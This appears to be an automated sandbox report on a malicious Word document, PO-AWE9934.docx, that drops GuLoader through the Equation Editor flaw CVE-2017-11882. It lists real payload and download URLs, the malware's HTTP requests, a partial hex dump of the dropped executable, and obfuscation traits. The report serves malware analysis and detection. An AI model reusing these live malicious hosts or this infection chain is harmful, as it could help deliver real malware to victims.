Windows Analysis Report
PO-AWE9934.docx

Overview

General Information

Sample Name:	PO-AWE9934.docx
Analysis ID:	562071
MD5:	41d90bec5e345b3f4a7086158e236730
SHA1:	5a179b748a9523ac4cd1b4010f294e5497b5329e
SHA256:	76772145ed4ca48917df45363d450652cba0605b307d85937166c3042ea85609
Tags:	docdocxInvoice
Infos:

Detection

GuLoader

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Multi AV Scanner detection for submitted file

Sigma detected: Droppers Exploiting CVE-2017-11882

Sigma detected: File Dropped By EQNEDT32EXE

Antivirus detection for URL or domain

Yara detected GuLoader

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)

Sigma detected: Execution from Suspicious Folder

Office equation editor drops PE file

Contains an external reference to another file

C2 URLs / IPs found in malware configuration

Drops PE files to the user root directory

Document has an unknown application name

May sleep (evasive loops) to hinder dynamic analysis

Contains functionality to shutdown / reboot the system

Uses code obfuscation techniques (call, push, ret)

PE file contains sections with non-standard names

Internet Provider seen in connection with other malware

Detected potential crypto function

JA3 SSL client fingerprint seen in connection with other malware

Contains functionality to call native functions

Contains functionality to dynamically determine API calls

Found dropped PE file which has not been started or loaded

Potential document exploit detected (performs DNS queries)

IP address seen in connection with other malware

Downloads executable code via HTTP

Uses insecure TLS / SSL version for HTTPS connection

Contains functionality for execution timing, often used to detect debuggers

Document misses a certain OLE stream usually present in this Microsoft Office document type

Abnormal high CPU Usage

Document contains no OLE stream with summary information

Potential document exploit detected (unknown TCP traffic)

PE file contains strange resources

Drops PE files

Contains functionality to read the PEB

Uses a known web browser user agent for HTTP communication

Office Equation Editor has been started

Binary contains a suspicious time stamp

Drops PE files to the user directory

Potential document exploit detected (performs HTTP gets)

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Creates a process in suspended mode (likely to inject code)

Contains functionality for read data from the clipboard

Classification

Signatures

AV Detection

Found malware configuration

Source: 00000009.00000002.722712672.0000000003690000.00000040.00000800.00020000.00000000.sdmp

Malware Configuration Extractor: GuLoader {"Payload URL": "https://www.konutmarket.com/2022file_iz"}

Multi AV Scanner detection for submitted file

Source: PO-AWE9934.docx	Virustotal: Detection: 26%			Perma Link
Source: PO-AWE9934.docx	ReversingLabs: Detection: 16%

Antivirus detection for URL or domain

Source: http://107.172.93.32/invoice/dhl_shp.wbk	Avira URL Cloud: Label: malware
Source: http://107.172.93.32/309/vbc.exe	Avira URL Cloud: Label: malware

Exploits

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe			Jump to behavior

Office Equation Editor has been started

Source: unknown

Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding

Compliance

Uses insecure TLS / SSL version for HTTPS connection

Source: unknown	HTTPS traffic detected: 66.29.141.207:443 -> 192.168.2.22:49168 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 66.29.141.207:443 -> 192.168.2.22:49169 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 66.29.141.207:443 -> 192.168.2.22:49170 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 66.29.141.207:443 -> 192.168.2.22:49171 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 66.29.141.207:443 -> 192.168.2.22:49176 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 66.29.141.207:443 -> 192.168.2.22:49177 version: TLS 1.0

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source: unknown

HTTPS traffic detected: 66.29.141.207:443 -> 192.168.2.22:49167 version: TLS 1.2

Source:	Binary string: secur32.pdb source: secur32.dll.9.dr
Source:	Binary string: SxsStore.pdb source: sxsstore.dll.9.dr
Source:	Binary string: secur32.pdbUGP source: secur32.dll.9.dr
Source:	Binary string: SxsStore.pdbGCTL source: sxsstore.dll.9.dr

Source: C:\Users\Public\vbc.exe	Code function: 9_2_00405C49 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,	9_2_00405C49
Source: C:\Users\Public\vbc.exe	Code function: 9_2_00406873 FindFirstFileW,FindClose,	9_2_00406873
Source: C:\Users\Public\vbc.exe	Code function: 9_2_0040290B FindFirstFileW,	9_2_0040290B

Software Vulnerabilities

Potential document exploit detected (performs DNS queries)

Source: global traffic

DNS query: name: onebztip.club

Potential document exploit detected (unknown TCP traffic)

Source: global traffic

TCP traffic: 192.168.2.22:49167 -> 66.29.141.207:443

Potential document exploit detected (performs HTTP gets)

Source: global traffic

TCP traffic: 192.168.2.22:49167 -> 66.29.141.207:443

Networking

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: https://www.konutmarket.com/2022file_iz

Internet Provider seen in connection with other malware

Source: Joe Sandbox View

ASN Name: ADVANTAGECOMUS ADVANTAGECOMUS

JA3 SSL client fingerprint seen in connection with other malware

Source: Joe Sandbox View	JA3 fingerprint: 05af1f5ca1b87cc9cc9b25185115607d
Source: Joe Sandbox View	JA3 fingerprint: 7dcce5b76c8b17472d024758970a406b

IP address seen in connection with other malware

Source: Joe Sandbox View

IP Address: 107.172.93.32 107.172.93.32

Downloads executable code via HTTP

Source: global traffic

HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 28 Jan 2022 10:26:23 GMTServer: Apache/2.4.52 (Win64) OpenSSL/1.1.1m PHP/7.4.27Last-Modified: Fri, 28 Jan 2022 05:43:22 GMTETag: "28938-5d69de9aa38e4"Accept-Ranges: bytesContent-Length: 166200Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 ad 31 08 81 e9 50 66 d2 e9 50 66 d2 e9 50 66 d2 2a 5f 39 d2 eb 50 66 d2 e9 50 67 d2 4c 50 66 d2 2a 5f 3b d2 e6 50 66 d2 bd 73 56 d2 e3 50 66 d2 2e 56 60 d2 e8 50 66 d2 52 69 63 68 e9 50 66 d2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 5a 9b 4f 61 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 6a 00 00 00 da 02 00 00 08 00 00 2d 35 00 00 00 10 00 00 00 80 00 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 06 00 00 00 04 00 00 00 00 00 00 00 00 a0 05 00 00 04 00 00 66 3e 03 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 10 86 00 00 a0 00 00 00 00 c0 04 00 c8 d5 00 00 00 00 00 00 00 00 00 00 d0 74 02 00 68 14 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 b0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 97 68 00 00 00 10 00 00 00 6a 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 a6 14 00 00 00 80 00 00 00 16 00 00 00 6e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 18 b0 02 00 00 a0 00 00 00 06 00 00 00 84 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 6e 64 61 74 61 00 00 00 60 01 00 00 60 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 c0 2e 72 73 72 63 00 00 00 c8 d5 00 00 00 c0 04 00 00 d6 00 00 00 8a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0

Uses insecure TLS / SSL version for HTTPS connection

Source: unknown	HTTPS traffic detected: 66.29.141.207:443 -> 192.168.2.22:49168 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 66.29.141.207:443 -> 192.168.2.22:49169 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 66.29.141.207:443 -> 192.168.2.22:49170 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 66.29.141.207:443 -> 192.168.2.22:49171 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 66.29.141.207:443 -> 192.168.2.22:49176 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 66.29.141.207:443 -> 192.168.2.22:49177 version: TLS 1.0

Uses a known web browser user agent for HTTP communication

Source: global traffic	HTTP traffic detected: GET /index.php/x HTTP/1.1Accept: /User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14)UA-CPU: AMD64Accept-Encoding: gzip, deflateHost: onebztip.clubConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /invoice/dhl_shp.wbk HTTP/1.1Accept: /User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14)UA-CPU: AMD64Accept-Encoding: gzip, deflateHost: 107.172.93.32Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /309/vbc.exe HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 107.172.93.32Connection: Keep-Alive

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49169
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49168
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49167
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49177
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49176
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49174
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49172
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49171
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49170
Source: unknown	Network traffic detected: HTTP traffic on port 49172 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49168 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49169 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49170 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49167 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49171 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49176 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49174 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49177 -> 443

Source: unknown	TCP traffic detected without corresponding DNS query: 107.172.93.32
Source: unknown	TCP traffic detected without corresponding DNS query: 107.172.93.32
Source: unknown	TCP traffic detected without corresponding DNS query: 107.172.93.32
Source: unknown	TCP traffic detected without corresponding DNS query: 107.172.93.32
Source: unknown	TCP traffic detected without corresponding DNS query: 107.172.93.32
Source: unknown	TCP traffic detected without corresponding DNS query: 107.172.93.32
Source: unknown	TCP traffic detected without corresponding DNS query: 107.172.93.32
Source: unknown	TCP traffic detected without corresponding DNS query: 107.172.93.32
Source: unknown	TCP traffic detected without corresponding DNS query: 107.172.93.32
Source: unknown	TCP traffic detected without corresponding DNS query: 107.172.93.32
Source: unknown	TCP traffic detected without corresponding DNS query: 107.172.93.32
Source: unknown	TCP traffic detected without corresponding DNS query: 107.172.93.32
Source: unknown	TCP traffic detected without corresponding DNS query: 107.172.93.32
Source: unknown	TCP traffic detected without corresponding DNS query: 107.172.93.32
Source: unknown	TCP traffic detected without corresponding DNS query: 107.172.93.32
Source: unknown	TCP traffic detected without corresponding DNS query: 107.172.93.32
Source: unknown	TCP traffic detected without corresponding DNS query: 107.172.93.32
Source: unknown	TCP traffic detected without corresponding DNS query: 107.172.93.32
Source: unknown	TCP traffic detected without corresponding DNS query: 107.172.93.32
Source: unknown	TCP traffic detected without corresponding DNS query: 107.172.93.32
Source: unknown	TCP traffic detected without corresponding DNS query: 107.172.93.32
Source: unknown	TCP traffic detected without corresponding DNS query: 107.172.93.32
Source: unknown	TCP traffic detected without corresponding DNS query: 107.172.93.32
Source: unknown	TCP traffic detected without corresponding DNS query: 107.172.93.32
Source: unknown	TCP traffic detected without corresponding DNS query: 107.172.93.32
Source: unknown	TCP traffic detected without corresponding DNS query: 107.172.93.32
Source: unknown	TCP traffic detected without corresponding DNS query: 107.172.93.32
Source: unknown	TCP traffic detected without corresponding DNS query: 107.172.93.32
Source: unknown	TCP traffic detected without corresponding DNS query: 107.172.93.32
Source: unknown	TCP traffic detected without corresponding DNS query: 107.172.93.32
Source: unknown	TCP traffic detected without corresponding DNS query: 107.172.93.32
Source: unknown	TCP traffic detected without corresponding DNS query: 107.172.93.32
Source: unknown	TCP traffic detected without corresponding DNS query: 107.172.93.32
Source: unknown	TCP traffic detected without corresponding DNS query: 107.172.93.32
Source: unknown	TCP traffic detected without corresponding DNS query: 107.172.93.32
Source: unknown	TCP traffic detected without corresponding DNS query: 107.172.93.32
Source: unknown	TCP traffic detected without corresponding DNS query: 107.172.93.32
Source: unknown	TCP traffic detected without corresponding DNS query: 107.172.93.32
Source: unknown	TCP traffic detected without corresponding DNS query: 107.172.93.32
Source: unknown	TCP traffic detected without corresponding DNS query: 107.172.93.32
Source: unknown	TCP traffic detected without corresponding DNS query: 107.172.93.32
Source: unknown	TCP traffic detected without corresponding DNS query: 107.172.93.32
Source: unknown	TCP traffic detected without corresponding DNS query: 107.172.93.32
Source: unknown	TCP traffic detected without corresponding DNS query: 107.172.93.32
Source: unknown	TCP traffic detected without corresponding DNS query: 107.172.93.32
Source: unknown	TCP traffic detected without corresponding DNS query: 107.172.93.32
Source: unknown	TCP traffic detected without corresponding DNS query: 107.172.93.32
Source: unknown	TCP traffic detected without corresponding DNS query: 107.172.93.32
Source: unknown	TCP traffic detected without corresponding DNS query: 107.172.93.32
Source: unknown	TCP traffic detected without corresponding DNS query: 107.172.93.32

Source: invoice on 107.172.93.32.url.0.dr	String found in binary or memory: http://107.172.93.32/invoice/
Source: vbc[1].exe.7.dr, vbc.exe.7.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: vbc[1].exe.7.dr, vbc.exe.7.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
Source: vbc[1].exe.7.dr, vbc.exe.7.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
Source: vbc[1].exe.7.dr, vbc.exe.7.dr	String found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
Source: vbc[1].exe.7.dr, vbc.exe.7.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: vbc[1].exe.7.dr, vbc.exe.7.dr	String found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
Source: vbc.exe, 00000009.00000002.722216855.000000000040A000.00000004.00000001.01000000.00000003.sdmp, vbc.exe, 00000009.00000000.453547212.000000000040A000.00000008.00000001.01000000.00000003.sdmp, vbc[1].exe.7.dr, vbc.exe.7.dr	String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: vbc[1].exe.7.dr, vbc.exe.7.dr	String found in binary or memory: http://ocsp.digicert.com0C
Source: vbc[1].exe.7.dr, vbc.exe.7.dr	String found in binary or memory: http://ocsp.digicert.com0O
Source: vbc[1].exe.7.dr, vbc.exe.7.dr	String found in binary or memory: http://www.digicert.com/CPS0
Source: x.url.0.dr	String found in binary or memory: https://onebztip.club/index.php/x
Source: vbc[1].exe.7.dr, vbc.exe.7.dr	String found in binary or memory: https://www.digicert.com/CPS0

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{EB971226-827B-47B0-8F41-C98C9532A108}.tmp

Jump to behavior

Source: unknown

DNS traffic detected: queries for: onebztip.club

Source: global traffic	HTTP traffic detected: GET /index.php/x HTTP/1.1Accept: /User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14)UA-CPU: AMD64Accept-Encoding: gzip, deflateHost: onebztip.clubConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /invoice/dhl_shp.wbk HTTP/1.1Accept: /User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14)UA-CPU: AMD64Accept-Encoding: gzip, deflateHost: 107.172.93.32Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /309/vbc.exe HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 107.172.93.32Connection: Keep-Alive

Source: unknown

HTTPS traffic detected: 66.29.141.207:443 -> 192.168.2.22:49167 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Contains functionality for read data from the clipboard

Source: C:\Users\Public\vbc.exe

Code function: 9_2_004056DE GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,

9_2_004056DE

System Summary

Office equation editor drops PE file

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\vbc[1].exe			Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\Public\vbc.exe			Jump to dropped file

Document has an unknown application name

Source: ~WRF{95D87E15-AC65-4DDD-9F50-9A36A5790D0B}.tmp.0.dr

OLE indicator application name: unknown

Contains functionality to shutdown / reboot the system

Source: C:\Users\Public\vbc.exe

Code function: 9_2_0040352D EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,

9_2_0040352D

Detected potential crypto function

Source: C:\Users\Public\vbc.exe	Code function: 9_2_0040755C	9_2_0040755C
Source: C:\Users\Public\vbc.exe	Code function: 9_2_00406D85	9_2_00406D85
Source: C:\Users\Public\vbc.exe	Code function: 9_2_73281BFF	9_2_73281BFF
Source: C:\Users\Public\vbc.exe	Code function: 9_2_03699C2E	9_2_03699C2E
Source: C:\Users\Public\vbc.exe	Code function: 9_2_03699963	9_2_03699963
Source: C:\Users\Public\vbc.exe	Code function: 9_2_03699462	9_2_03699462
Source: C:\Users\Public\vbc.exe	Code function: 9_2_0369DAF1	9_2_0369DAF1
Source: C:\Users\Public\vbc.exe	Code function: 9_2_03698AD9	9_2_03698AD9

Contains functionality to call native functions

Source: C:\Users\Public\vbc.exe

Code function: 9_2_03699C2E NtAllocateVirtualMemory,

9_2_03699C2E

Document misses a certain OLE stream usually present in this Microsoft Office document type

Source: ~WRF{95D87E15-AC65-4DDD-9F50-9A36A5790D0B}.tmp.0.dr

OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false

Abnormal high CPU Usage

Source: C:\Users\Public\vbc.exe

Process Stats: CPU usage > 98%

Document contains no OLE stream with summary information

Source: ~WRF{95D87E15-AC65-4DDD-9F50-9A36A5790D0B}.tmp.0.dr

OLE indicator has summary info: false

PE file contains strange resources

Source: vbc[1].exe.7.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: vbc[1].exe.7.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: vbc[1].exe.7.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: vbc.exe.7.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: vbc.exe.7.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: vbc.exe.7.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Source: C:\Users\Public\vbc.exe	Memory allocated: 76F90000 page execute and read and write			Jump to behavior
Source: C:\Users\Public\vbc.exe	Memory allocated: 76E90000 page execute and read and write			Jump to behavior

Source: PO-AWE9934.docx	Virustotal: Detection: 26%
Source: PO-AWE9934.docx	ReversingLabs: Detection: 16%

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA

Jump to behavior

Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
Source: unknown	Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe "C:\Users\Public\vbc.exe"
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe "C:\Users\Public\vbc.exe"	Jump to behavior

Source: C:\Users\Public\vbc.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\InProcServer32

Jump to behavior

Source: C:\Users\Public\vbc.exe

9_2_0040352D

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\Desktop\~$-AWE9934.docx

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\AppData\Local\Temp\CVRDB50.tmp

Jump to behavior

Source: classification engine

Classification label: mal100.troj.expl.evad.winDOCX@4/26@13/2

Source: C:\Users\Public\vbc.exe

Code function: 9_2_004021AA CoCreateInstance,

9_2_004021AA

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\Public\vbc.exe

Code function: 9_2_0040498A GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,

9_2_0040498A

Source: ~WRF{95D87E15-AC65-4DDD-9F50-9A36A5790D0B}.tmp.0.dr	OLE document summary: title field not present or empty
Source: ~WRF{95D87E15-AC65-4DDD-9F50-9A36A5790D0B}.tmp.0.dr	OLE document summary: author field not present or empty
Source: ~WRF{95D87E15-AC65-4DDD-9F50-9A36A5790D0B}.tmp.0.dr	OLE document summary: edited time not present or 0

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source:	Binary string: secur32.pdb source: secur32.dll.9.dr
Source:	Binary string: SxsStore.pdb source: sxsstore.dll.9.dr
Source:	Binary string: secur32.pdbUGP source: secur32.dll.9.dr
Source:	Binary string: SxsStore.pdbGCTL source: sxsstore.dll.9.dr

Source: ~WRF{95D87E15-AC65-4DDD-9F50-9A36A5790D0B}.tmp.0.dr

Initial sample: OLE indicators vbamacros = False

Data Obfuscation

Yara detected GuLoader

Source: Yara match

File source: 00000009.00000002.722712672.0000000003690000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY

Uses code obfuscation techniques (call, push, ret)

Source: C:\Users\Public\vbc.exe	Code function: 9_2_732830C0 push eax; ret	9_2_732830EE
Source: C:\Users\Public\vbc.exe	Code function: 9_2_0369594F pushfd ; retf	9_2_03695981
Source: C:\Users\Public\vbc.exe	Code function: 9_2_03691B54 push FFFFFF81h; ret	9_2_03691B58
Source: C:\Users\Public\vbc.exe	Code function: 9_2_03691F2D push edx; retf	9_2_03691F51
Source: C:\Users\Public\vbc.exe	Code function: 9_2_03691F27 push 00000027h; iretd	9_2_03691F29
Source: C:\Users\Public\vbc.exe	Code function: 9_2_03695919 pushfd ; retf	9_2_03695981
Source: C:\Users\Public\vbc.exe	Code function: 9_2_0369111B push esi; ret	9_2_0369111C
Source: C:\Users\Public\vbc.exe	Code function: 9_2_036949EF pushad ; iretd	9_2_03694A06
Source: C:\Users\Public\vbc.exe	Code function: 9_2_03696BD2 push 910F868Eh; ret	9_2_03696C30
Source: C:\Users\Public\vbc.exe	Code function: 9_2_03696BA9 push 910F868Eh; ret	9_2_03696C30
Source: C:\Users\Public\vbc.exe	Code function: 9_2_036959A1 pushfd ; retf	9_2_03695981
Source: C:\Users\Public\vbc.exe	Code function: 9_2_03692C74 push edx; retf	9_2_03692CCC
Source: C:\Users\Public\vbc.exe	Code function: 9_2_03696C4F push 910F868Eh; ret	9_2_03696C30
Source: C:\Users\Public\vbc.exe	Code function: 9_2_03692C14 push edx; retf	9_2_03692CCC
Source: C:\Users\Public\vbc.exe	Code function: 9_2_03694ECB push eax; iretd	9_2_03694ECC
Source: C:\Users\Public\vbc.exe	Code function: 9_2_036950CB push esi; retf	9_2_036950CC
